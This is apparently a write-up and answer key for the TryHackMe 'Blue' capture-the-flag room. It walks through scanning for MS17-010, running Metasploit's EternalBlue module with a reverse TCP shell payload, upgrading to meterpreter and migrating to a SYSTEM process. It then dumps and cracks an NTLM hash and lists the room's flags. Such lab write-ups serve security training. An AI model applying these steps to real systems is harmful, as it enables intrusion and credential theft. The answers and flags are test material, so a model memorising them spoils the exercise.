# BLUE

![Blue](https://m0rn1ngstr.github.io/assets/images/Blue/blue.jpg)

## [Video Write-up](https://www.youtube.com/watch?v=MIbYjac5ato&t=79s)

Link :- https://tryhackme.com/room/blue

## Taks-1 (Recon)

* [Nmap_results](https://gitlab.com/Ayush_C/thm/-/blob/master/Blue/nmap/enumeration.md)

1. Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

```
Done
```

2. How many ports are open with a port number under 1000?

```
3
```

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

```
MS17-010
```

> Nmap Syntax

```
nmap --script=smb-vuln-ms17-010.nse (ip address)
```

## Task-2 (Gain Access)

1. Start Metasploit

```
Done
```

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

```
exploit/windows/smb/ms17_010_eternalblue
```

3. Show options and set the one required value. What is the name of this value? (All caps for submission)

```
RHOSTS
```

4. Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

```set payload windows/x64/shell/reverse_tcp```

With that done, run the exploit!

```
Done
```

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target. 

```
Done
```

## Task-3 (Escalate)

1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) 


```
post/multi/manage/shell_to_meterpreter
```

2. Select this (use MODULE_PATH). Show options, what option are we required to change?

```
Session
```

3. Set the required option, you may need to list all of the sessions to find your target here. 

```
Done
```

4. Run! If this doesn't work, try completing the exploit from the previous task once more.

```
Done
```

5. Once the meterpreter shell conversion completes, select that session for use.

```
Done
```

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again. 

```
Done
```

7. List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

```
Done
```

8. Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time. 

```
Done
```

## Task-4 (Cracking)

1. Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? 

```
Jon
```

> NTLM_HASH

```
ffb43f0de35be4d9917ac0cc8ad57f8d
```

**Crack Station** : https://crackstation.net

2. Copy this password hash to a file and research how to crack it. What is the cracked password?

```
alqfna22
```

## Task-5 (Find flags!) 

1.  Flag1? This flag can be found at the system root. 

```
flag{access_the_machine}
```

2. Flag2? This flag can be found at the location where passwords are stored within Windows.

```
flag{sam_database_elevated_access}
```

3. flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved. 

```
flag{admin_documents_can_be_valuable}
```
